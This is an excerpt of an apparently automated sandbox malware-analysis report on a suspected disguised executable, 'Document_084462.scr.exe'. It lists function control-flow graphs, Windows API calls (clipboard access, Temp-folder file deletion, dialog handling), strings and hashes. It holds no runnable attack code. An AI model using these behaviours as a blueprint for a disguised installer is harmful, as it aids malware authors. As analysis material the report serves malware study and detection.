405862-405877 TrackPopupMenu 170->176 177 40584f-40585f GetWindowRect 170->177 171->165 176->171 181 40587d-405894 176->181 177->176 182 4056ea 178->182 183 4056dd-4056e8 ShowWindow 178->183 179->171 180 405722-40573a SendMessageW * 2 179->180 180->171 184 405899-4058b4 SendMessageW 181->184 185 4056f0-4056f6 call 404379 182->185 183->185 184->184 186 4058b6-4058d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4058db-405902 SendMessageW 186->188 188->188 189 405904-405918 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->171
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055F3
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405602
                                                                              • GetClientRect.USER32(?,?), ref: 0040563F
                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405646
                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405667
                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405678
                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040568B
                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405699
                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056AC
                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056CE
                                                                              • ShowWindow.USER32(?,00000008), ref: 004056E2
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405703
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405713
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040572C
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405738
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405611
                                                                                • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,?,004041A4), ref: 00404387
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405755
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005529,00000000), ref: 00405763
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0040576A
                                                                              • ShowWindow.USER32(00000000), ref: 0040578E
                                                                              • ShowWindow.USER32(?,00000008), ref: 00405793
                                                                              • ShowWindow.USER32(00000008), ref: 004057DD
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405811
                                                                              • CreatePopupMenu.USER32 ref: 00405822
                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405836
                                                                              • GetWindowRect.USER32(?,?), ref: 00405856
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040586F
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A7
                                                                              • OpenClipboard.USER32(00000000), ref: 004058B7
                                                                              • EmptyClipboard.USER32 ref: 004058BD
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C9
                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058D3
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E7
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405907
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405912
                                                                              • CloseClipboard.USER32 ref: 00405918
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID: {
                                                                              • API String ID: 590372296-366298937
                                                                              • Opcode ID: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                                                              • Instruction ID: ce320b3aa05de7a86cd71a66421b7d26801e1fa413e38a053d13c4a4e4f3a794
                                                                              • Opcode Fuzzy Hash: 76257269951a7008dfdc90867c28ba5585546a04cccc1881335d18026b5b47bc
                                                                              • Instruction Fuzzy Hash: 43B15BB1900608FFDB119F64DD89EAE7B79FB44354F00802AFA45B61A0CB794E51DFA8
                                                                              Function 00405B00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 435 405b00-405b26 call 405dcb 438 405b28-405b3a DeleteFileW 435->438 439 405b3f-405b46 435->439 440 405cbc-405cc0 438->440 441 405b48-405b4a 439->441 442 405b59-405b69 call 4063ee 439->442 443 405b50-405b53 441->443 444 405c6a-405c6f 441->444 448 405b78-405b79 call 405d0f 442->448 449 405b6b-405b76 lstrcatW 442->449 443->442 443->444 444->440 447 405c71-405c74 444->447 450 405c76-405c7c 447->450 451 405c7e-405c86 call 40674c 447->451 452 405b7e-405b82 448->452 449->452 450->440 451->440 458 405c88-405c9c call 405cc3 call 405ab8 451->458 456 405b84-405b8c 452->456 457 405b8e-405b94 lstrcatW 452->457 456->457 459 405b99-405bb5 lstrlenW FindFirstFileW 456->459 457->459 475 405cb4-405cb7 call 405456 458->475 476 405c9e-405ca1 458->476 460 405bbb-405bc3 459->460 461 405c5f-405c63 459->461 463 405be3-405bf7 call 4063ee 460->463 464 405bc5-405bcd 460->464 461->444 466 405c65 461->466 477 405bf9-405c01 463->477 478 405c0e-405c19 call 405ab8 463->478 467 405c42-405c52 FindNextFileW 464->467 468 405bcf-405bd7 464->468 466->444 467->460 474 405c58-405c59 FindClose 467->474 468->463 471 405bd9-405be1 468->471 471->463 471->467 474->461 475->440 476->450 479 405ca3-405cb2 call 405456 call 4061b4 476->479 477->467 480 405c03-405c0c call 405b00 477->480 488 405c3a-405c3d call 405456 478->488 489 405c1b-405c1e 478->489 479->440 480->467 488->467 492 405c20-405c30 call 405456 call 4061b4 489->492 493 405c32-405c38 489->493 492->467 493->467
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
                                                                              • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B71
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B94
                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B9A
                                                                              • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAA
                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C4A
                                                                              • FindClose.KERNEL32(00000000), ref: 00405C59
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                                                              • API String ID: 2035342205-4003151211
                                                                              • Opcode ID: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                                                              • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                                                              • Opcode Fuzzy Hash: 9bcf84aa20197a85572e9300232fccf325a3569ae83ff5500f6c5511c7c60933
                                                                              • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E
                                                                              Function 00405456 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 628 405456-40546b 629 405471-405482 628->629 630 405522-405526 628->630 631 405484-405488 call 40642b 629->631 632 40548d-405499 lstrlenW 629->632 631->632 634 4054b6-4054ba 632->634 635 40549b-4054ab lstrlenW 632->635 637 4054c9-4054cd 634->637 638 4054bc-4054c3 SetWindowTextW 634->638 635->630 636 4054ad-4054b1 lstrcatW 635->636 636->634 639 405513-405515 637->639 640 4054cf-405511 SendMessageW * 3 637->640 638->637 639->630 641 405517-40551a 639->641 640->639 641->630
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                              • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                              • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,770423A0), ref: 004054B1
                                                                              • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 2531174081-0
                                                                              • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                                                              • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                                                              • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                                                              • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8
                                                                              Function 0040674C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(77043420,007A4F98,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00405E14,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
                                                                              • FindClose.KERNEL32(00000000), ref: 00406763
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp, xrefs: 0040674C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp
                                                                              • API String ID: 2295610775-2333618704
                                                                              • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                                              • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                                                              • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                                              • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC
                                                                              Function 00403E6B Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 190 403e6b-403e7d 191 403e83-403e89 190->191 192 403fbe-403fcd 190->192 191->192 193 403e8f-403e98 191->193 194 40401c-404031 192->194 195 403fcf-404017 GetDlgItem * 2 call 404344 SetClassLongW call 40140b 192->195 198 403e9a-403ea7 SetWindowPos 193->198 199 403ead-403eb0 193->199 196 404071-404076 call 404390 194->196 197 404033-404036 194->197 195->194 209 40407b-404096 196->209 201 404038-404043 call 401389 197->201 202 404069-40406b 197->202 198->199 204 403eb2-403ec4 ShowWindow 199->204 205 403eca-403ed0 199->205 201->202 223 404045-404064 SendMessageW 201->223 202->196 208 404311 202->208 204->205 210 403ed2-403ee7 DestroyWindow 205->210 211 403eec-403eef 205->211 218 404313-40431a 208->218 216 404098-40409a call 40140b 209->216 217 40409f-4040a5 209->217 219 4042ee-4042f4 210->219 213 403ef1-403efd SetWindowLongW 211->213 214 403f02-403f08 211->214 213->218 221 403fab-403fb9 call 4043ab 214->221 222 403f0e-403f1f GetDlgItem 214->222 216->217 226 4040ab-4040b6 217->226 227 4042cf-4042e8 DestroyWindow EndDialog 217->227 219->208 225 4042f6-4042fc 219->225 221->218 228 403f21-403f38 SendMessageW IsWindowEnabled 222->228 229 403f3e-403f41 222->229 223->218 225->208 231 4042fe-404307 ShowWindow 225->231 226->227 232 4040bc-404109 call 40642b call 404344 * 3 GetDlgItem 226->232 227->219 228->208 228->229 233 403f43-403f44 229->233 234 403f46-403f49 229->234 231->208 260 404113-40414f ShowWindow KiUserCallbackDispatcher call 404366 EnableWindow 232->260 261 40410b-404110 232->261 238 403f74-403f79 call 40431d 233->238 239 403f57-403f5c 234->239 240 403f4b-403f51 234->240 238->221 243 403f92-403fa5 SendMessageW 239->243 245 403f5e-403f64 239->245 240->243 244 403f53-403f55 240->244 243->221 244->238 248 403f66-403f6c call 40140b 245->248 249 403f7b-403f84 call 40140b 245->249 258 403f72 248->258 249->221 257 403f86-403f90 249->257 257->258 258->238 264 404151-404152 260->264 265 404154 260->265 261->260 266 404156-404184 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404186-404197 SendMessageW 266->267 268 404199 266->268 269 40419f-4041de call 404379 call 403e4c call 4063ee lstrlenW call 40642b SetWindowTextW call 401389 267->269 268->269 269->209 280 4041e4-4041e6 269->280 280->209 281 4041ec-4041f0 280->281 282 4041f2-4041f8 281->282 283 40420f-404223 DestroyWindow 281->283 282->208 285 4041fe-404204 282->285 283->219 284 404229-404256 CreateDialogParamW 283->284 284->219 286 40425c-4042b3 call 404344 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 284->286 285->209 287 40420a 285->287 286->208 292 4042b5-4042c8 ShowWindow call 404390 286->292 287->208 294 4042cd 292->294 294->219
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
                                                                              • ShowWindow.USER32(?), ref: 00403EC4
                                                                              • DestroyWindow.USER32 ref: 00403ED8
                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                                                              • GetDlgItem.USER32(?,?), ref: 00403F15
                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                                                              • GetDlgItem.USER32(?,?), ref: 00403FDE
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403FE8
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                                                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404053
                                                                              • GetDlgItem.USER32(?,00000003), ref: 004040F9
                                                                              • ShowWindow.USER32(00000000,?), ref: 0040411A
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                                                              • EnableWindow.USER32(?,?), ref: 00404147
                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040415D
                                                                              • EnableMenuItem.USER32(00000000), ref: 00404164
                                                                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040417C
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
                                                                              • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                                                              • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404301
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                              • String ID:
                                                                              • API String ID: 3282139019-0
                                                                              • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                                                              • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                                                              • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                                                              • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E
                                                                              Function 00403ABD Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 295 403abd-403ad5 call 4067e3 298 403ad7-403ae2 GetUserDefaultUILanguage call 406335 295->298 299 403ae9-403b20 call 4062bc 295->299 302 403ae7 298->302 305 403b22-403b33 call 4062bc 299->305 306 403b38-403b3e lstrcatW 299->306 304 403b43-403b6c call 403d93 call 405dcb 302->304 312 403b72-403b77 304->312 313 403bfe-403c06 call 405dcb 304->313 305->306 306->304 312->313 314 403b7d-403ba5 call 4062bc 312->314 319 403c14-403c39 LoadImageW 313->319 320 403c08-403c0f call 40642b 313->320 314->313 321 403ba7-403bab 314->321 323 403cba-403cc2 call 40140b 319->323 324 403c3b-403c6b RegisterClassW 319->324 320->319 325 403bbd-403bc9 lstrlenW 321->325 326 403bad-403bba call 405cf0 321->326 338 403cc4-403cc7 323->338 339 403ccc-403cd7 call 403d93 323->339 327 403c71-403cb5 SystemParametersInfoW CreateWindowExW 324->327 328 403d89 324->328 332 403bf1-403bf9 call 405cc3 call 4063ee 325->332 333 403bcb-403bd9 lstrcmpiW 325->333 326->325 327->323 331 403d8b-403d92 328->331 332->313 333->332 337 403bdb-403be5 GetFileAttributesW 333->337 342 403be7-403be9 337->342 343 403beb-403bec call 405d0f 337->343 338->331 347 403d60-403d61 call 405529 339->347 348 403cdd-403cf7 ShowWindow call 406773 339->348 342->332 342->343 343->332 351 403d66-403d68 347->351 355 403d03-403d15 GetClassInfoW 348->355 356 403cf9-403cfe call 406773 348->356 353 403d82-403d84 call 40140b 351->353 354 403d6a-403d70 351->354 353->328 354->338 357 403d76-403d7d call 40140b 354->357 360 403d17-403d27 GetClassInfoW RegisterClassW 355->360 361 403d2d-403d50 DialogBoxParamW call 40140b 355->361 356->355 357->338 360->361 365 403d55-403d5e call 403a0d 361->365 365->331
                                                                              APIs
                                                                                • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                                • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000), ref: 00403AD7
                                                                                • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                                                              • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000), ref: 00403B3E
                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,77043420), ref: 00403BBE
